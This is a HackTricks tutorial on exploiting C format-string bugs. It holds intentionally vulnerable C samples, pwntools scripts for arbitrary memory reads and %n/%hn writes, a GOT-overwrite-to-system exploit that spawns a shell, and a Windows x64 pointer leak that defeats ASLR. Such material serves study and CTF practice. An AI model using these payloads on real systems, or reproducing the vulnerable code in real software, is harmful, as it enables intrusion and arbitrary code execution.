Format Strings

tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the Telegram group, or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud GitHub repos.

Basic Information

In C, printf is a function that can be used to print a string. The first parameter this function expects is the raw text containing the formatters. The following parameters are the values that replace the formatters in the raw text.

Other vulnerable functions are sprintf() and fprintf().

The vulnerability appears when attacker-controlled text is passed as the first argument to this function. By abusing the capabilities of printf format strings, the attacker can craft input that reads data from any readable address and writes data to any writable address. This can lead to arbitrary code execution.

Formatters:

bash

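%08x —> 8 hex digits (4 bytes), zero-padded
%d —> Signed integer
%u —> Unsigned integer
%s —> String
%p —> Pointer
%n —> Writes the number of bytes printed so far to the address given by the argument
%hn —> Same as %n, but writes 2 bytes instead of 4
%<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3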

Examples:

Vulnerable example:

char buffer[30];
gets(buffer);  // Dangerous: takes user input without restrictions.
printf(buffer);  // If buffer contains "%x", it reads from the stack.

Normal use:

int value = 1205;
printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5

With missing arguments:

printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.

fprintf vulnerable:

#include <stdio.h>

int main(int argc, char *argv[]) {
    char *user_input;
    user_input = argv[1];
    FILE *output_file = fopen("output.txt", "w");
    fprintf(output_file, user_input); // The user input can include formatters!
    fclose(output_file);
    return 0;
}

Accessing Pointers

The format %<n>$x, where n is a number, tells printf to select the n-th parameter (from the stack). So if you want to read the 4th parameter from the stack using printf, you could do:

printf("%x %x %x %x")

and you would read from the first to the fourth parameter.

Or you could do:

printf("%4$x")

and read the fourth one directly.

Note that the attacker controls the format string passed to printf, so their input is on the stack when printf is called. This means they can place specific memory addresses on the stack.

caution

An attacker who controls this input can add arbitrary addresses to the stack and make printf access them. The next section explains how to use this behaviour.
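
As a minimal sketch of the direct-access syntax described above, the helpers below build a probe string that requests several argument slots at once and split the reply into one token per slot. The function names `build_probe` and `split_leak` and the `.` separator are illustrative assumptions, not part of any library.

```python
def build_probe(first, last, conv="p", sep="."):
    """Return a format string that dumps argument slots first..last (hypothetical helper)."""
    if first < 1 or last < first:
        raise ValueError("slots are 1-indexed and last must be >= first")
    # "%<n>$p" selects the n-th argument directly instead of walking the list.
    return sep.join(f"%{n}${conv}" for n in range(first, last + 1)).encode()


def split_leak(output, sep="."):
    """Split the target's reply into one token per requested slot."""
    return output.strip().split(sep.encode())


if __name__ == "__main__":
    print(build_probe(1, 4))  # b'%1$p.%2$p.%3$p.%4$p'
```

Sending the probe to a vulnerable printf and passing the reply to `split_leak` gives a list whose index 0 corresponds to slot `first`.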

Arbitrary Read

The formatter %<n>$s makes printf take the address stored at position n, follow it, and print the data there as a string (until a 0x00 byte is found). So if the base address of the binary is 0x8048000 and the user input starts at the 4th position on the stack, the start of the binary can be printed with:

python

from pwn import *

p = process('./bin')

payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'

caution

Note that you cannot put the address 0x8048000 at the beginning of the input, because the address contains a 0x00 byte and printf stops parsing the format string at the first null byte.
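
The layout used above (directive first, padding, then the address) can be sketched without pwntools. This is only an illustration under stated assumptions: a little-endian target, an input that starts exactly at argument slot `input_offset`, and a hypothetical helper name `build_read_payload`.

```python
import struct


def build_read_payload(address, input_offset, word_size=4, pad_len=8):
    """Build b'%<n>$s' + padding + packed address (hypothetical helper).

    The directive comes first so that a NUL byte inside the address
    cannot cut the format string before printf has parsed it.
    """
    if word_size not in (4, 8):
        raise ValueError("word_size must be 4 or 8")
    if pad_len % word_size:
        raise ValueError("pad_len must be a multiple of word_size")
    # The address starts pad_len bytes into the input, i.e. this many slots later.
    index = input_offset + pad_len // word_size
    spec = f"%{index}$s".encode()
    if len(spec) > pad_len:
        raise ValueError("pad_len is too small for the directive")
    packed = struct.pack("<I" if word_size == 4 else "<Q", address)
    return spec.ljust(pad_len, b"x") + packed


if __name__ == "__main__":
    print(build_read_payload(0x8048000, input_offset=4))
```

With the values from the example (input at slot 4, 8 bytes before the address) the helper selects slot 6, matching the hand-built payload.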

Find offset

To find the offset to your input, send 4 or 8 bytes (0x41414141) followed by %1$x and increase the value until you get the A's back.
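
Instead of one request per offset, several slots can be requested in a single payload and the reply searched for the marker. The sketch below assumes a little-endian target that echoes the formatted string back; `make_offset_payload` and `find_input_offset` are hypothetical names used only for illustration.

```python
def make_offset_payload(marker=b"AAAA", slots=10, sep=b"."):
    """Marker followed by %1$x.%2$x... so every slot is printed in one reply."""
    return marker + sep.join(f"%{n}$x".encode() for n in range(1, slots + 1))


def find_input_offset(output, marker=b"AAAA", sep=b"."):
    """Return the 1-indexed slot whose value is the marker, or None."""
    # The marker itself is echoed first; drop it so only leaked values remain.
    if output.startswith(marker):
        output = output[len(marker):]
    # Little-endian: b"AAAA" is read back as the integer 0x41414141.
    wanted = marker[::-1].hex()
    for slot, token in enumerate(output.strip().split(sep), start=1):
        text = token.decode(errors="replace").lower()
        if text.startswith("0x"):  # %p prints a prefix, %x does not
            text = text[2:]
        if text == wanted:
            return slot
    return None


if __name__ == "__main__":
    print(make_offset_payload(slots=4))  # b'AAAA%1$x.%2$x.%3$x.%4$x'
```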

Brute Force printf offset

python

# Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

# Iterate over candidate offsets (positional arguments are 1-indexed, so start at 1)
for i in range(1, 10):
    # Construct a payload that includes the current integer as offset
    payload = f"AAAA%{i}$x".encode()

    # Start a new process of the "chall" binary
    p = process("./chall")

    # Send the payload to the process
    p.sendline(payload)

    # Read and store the output of the process
    output = p.clean()

    # Close the process before deciding whether to stop
    p.close()

    # Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
    if b"41414141" in output:
        # If the string is found, log the success message and break out of the loop
        log.success(f"User input is at offset : {i}")
        break

How useful

Arbitrary reads can be useful to:

Dump the binary from memory
Access specific parts of memory where sensitive info is stored (like canaries, encryption keys or custom passwords like in this CTF challenge)

Arbitrary Write

The formatter %<num>$n writes the number of bytes printed so far to the address stored in the <num> parameter on the stack. If an attacker can make printf print as many characters as they want, they can use %<num>$n to write an arbitrary number to an arbitrary address.

Fortunately, writing the number 9999 does not require adding 9999 "A"s to the input. Instead, the formatter %.<num-write>d%<num>$n writes the number <num-write> to the address pointed to by the <num> position.

bash

AAAA%.6000d%4\$n —> Write 6004 to the address indicated by the 4th param
AAAA.%500\$08x —> Param at offset 500
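
The arithmetic behind the first line (4 bytes of "AAAA" plus 6000 padded characters gives 6004) can be sketched as a small helper. `padding_for` is a hypothetical name. The modular wrap reflects that %hn stores only the low 16 bits of the running count, so a smaller target can still be reached by printing past 0x10000.

```python
def padding_for(target, already_printed, width_bits=32):
    """Characters still to print so the running count equals target.

    The result is taken modulo 2**width_bits because a narrow store
    (16 bits for %hn) keeps only the low bits of the count.
    """
    return (target - already_printed) % (1 << width_bits)


if __name__ == "__main__":
    pad = padding_for(6004, len("AAAA"))
    print(pad)                      # 6000
    print(f"AAAA%.{pad}d%4$n")      # AAAA%.6000d%4$n
```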

However, note that to write an address such as 0x08049724 (a HUGE number to write at once), $hn is normally used instead of $n. It writes only 2 bytes, so the operation is done twice: once for the highest 2 bytes of the address and once for the lowest.

Therefore, this vulnerability allows writing anything to any address (arbitrary write).

In this example, the goal is to overwrite the address of a function in the GOT that will be called later. Other arbitrary-write-to-exec techniques could be abused instead:

Write What Where 2 Exec

We are going to overwrite a function that receives its arguments from the user and point it to the system function.
As mentioned, writing the address usually takes 2 steps: first you write 2 bytes of the address and then the other 2. To do so, $hn is used.

HOB refers to the 2 higher bytes of the address
LOB refers to the 2 lower bytes of the address

Then, because the count of printed bytes that $hn stores can only increase, you need to write the smaller of [HOB, LOB] first and then the other one.

If HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]\$hn

If HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]\$hn

Field order (HOB < LOB case): address of HOB, address of LOB, HOB-8, param number of the HOB address, LOB-HOB, param number of the LOB address

bash

python2 -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'
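
The two templates above can be sketched as one function that picks the order automatically. This is a minimal illustration, not a replacement for a full payload generator: it assumes a 32-bit little-endian target, that the two packed addresses land at argument slots `offset` and `offset+1`, and that the addresses contain no NUL bytes. The name `hn_payload_32` is hypothetical.

```python
import struct


def hn_payload_32(address, value, offset):
    """Build [address+2][address] plus two %hn writes, smaller half first."""
    hob, lob = (value >> 16) & 0xFFFF, value & 0xFFFF
    # Slot `offset` holds address+2 (receives HOB); slot offset+1 holds address (LOB).
    writes = sorted([(hob, offset), (lob, offset + 1)])
    payload = struct.pack("<II", address + 2, address)
    printed = len(payload)  # the 8 address bytes already count as output
    for half, slot in writes:
        pad = half - printed
        # %.Nx prints at least N digits; a 32-bit value never needs more than 8,
        # so N >= 8 guarantees exactly N characters are printed.
        if pad < 8:
            raise ValueError("halves too small or too close for this simple layout")
        payload += f"%.{pad}x%{slot}$hn".encode()
        printed = half
    return payload


if __name__ == "__main__":
    print(hn_payload_32(0x08049724, 0xBFFFFC2F, 4))
```

For the address 0x08049724, the value 0xBFFFFC2F and offset 4, the function reproduces the one-liner shown above (padding 49143 and 15408).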

Pwntools Template

You can find a template to prepare an exploit for this kind of vulnerability in:

Format Strings Template

Or this basic example from here:

python

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline(b'/bin/sh')

p.interactive()

Format Strings to BOF

It's possible to abuse the write actions of a format string vulnerability to write to addresses on the stack and exploit a buffer overflow type of vulnerability.

Windows x64: Format-string leak to bypass ASLR (no varargs)

On Windows x64 the first four integer/pointer parameters are passed in registers: RCX, RDX, R8, R9. In many buggy call-sites the attacker-controlled string is used as the format argument but no variadic arguments are provided, for example:

// keyData is fully controlled by the client
// _snprintf(dst, len, fmt, ...)
_snprintf(keyStringBuffer, 0xff2, (char*)keyData);

Because no varargs are passed, any conversion such as "%p", "%x" or "%s" makes the CRT read the next variadic argument from the appropriate register. With the Microsoft x64 calling convention, the first such read for "%p" comes from R9. Whatever transient value is in R9 at the call-site gets printed. In practice this often leaks a stable in-module pointer (for example, a pointer to a local/global object previously placed in R9 by surrounding code, or a callee-saved value), which can be used to recover the module base and defeat ASLR.

Practical workflow:

Inject a harmless format such as "%p " at the very beginning of the attacker-controlled string so the first conversion executes before any filtering.
Capture the leaked pointer, identify the static offset of that object inside the module (by reversing once with symbols or a local copy), and recover the image base as leak - known_offset.
Reuse that base to compute absolute addresses for ROP gadgets and IAT entries remotely.

Example (abbreviated python):

python

from pwn import remote

# Send an input that the vulnerable code will pass as the "format"
fmt = b"%p " + b"-AAAAA-BBB-CCCC-0252-"  # leading %p leaks R9
io = remote(HOST, 4141)
# ... drive protocol to reach the vulnerable snprintf ...
leaked = int(io.recvline().split()[2], 16)   # e.g. 0x7ff6693d0660
base   = leaked - 0x20660                     # module base = leak - offset
print(hex(leaked), hex(base))

Notes:

The exact offset to subtract is found once during local reversing and then reused (same binary/version).
If "%p" doesn’t print a valid pointer on the first try, try other specifiers ("%llx", "%s") or multiple conversions ("%p %p %p") to sample other argument registers/stack.
This pattern is specific to the Windows x64 calling convention and printf-family implementations that fetch nonexistent varargs from registers when the format string requests them.

This technique is extremely useful to bootstrap ROP on Windows services compiled with ASLR and no obvious memory disclosure primitives.
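
The base recovery step can be sketched with a sanity check. The check relies on Windows mapping images on 64 KiB boundaries, so a misaligned result suggests a wrong offset or an unrelated leak. `recover_image_base` and `rebase` are hypothetical helper names, and the RVA in the usage lines is a made-up placeholder.

```python
def recover_image_base(leaked_ptr, known_offset, alignment=0x10000):
    """Return leak - known_offset, rejecting results that are not 64 KiB aligned."""
    base = leaked_ptr - known_offset
    if base <= 0 or base % alignment:
        raise ValueError(f"implausible image base: {base:#x}")
    return base


def rebase(base, rva):
    """Turn a relative virtual address (e.g. of a gadget) into an absolute one."""
    return base + rva


if __name__ == "__main__":
    base = recover_image_base(0x7FF6693D0660, 0x20660)
    print(hex(base))                  # 0x7ff6693b0000
    print(hex(rebase(base, 0x1234)))  # 0x1234 is a placeholder RVA
```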

Other Examples & References

https://ir0nstone.gitbook.io/notes/types/stack/format-string
https://www.youtube.com/watch?v=t1LH9D5cuK4
https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html
32 bit, no relro, no canary, nx, no pie, basic use of format strings to leak the flag from the stack (no need to alter the execution flow)
https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
32 bit, relro, no canary, nx, no pie, format string to overwrite the address of fflush with the win function (ret2win)
https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html
32 bit, relro, no canary, nx, no pie, format string to write an address inside main in .fini_array (so the flow loops back 1 more time) and to overwrite the GOT entry of strlen with the address of system. When the flow goes back to main, strlen is called with user input and, since it now points to system, it executes the passed commands.
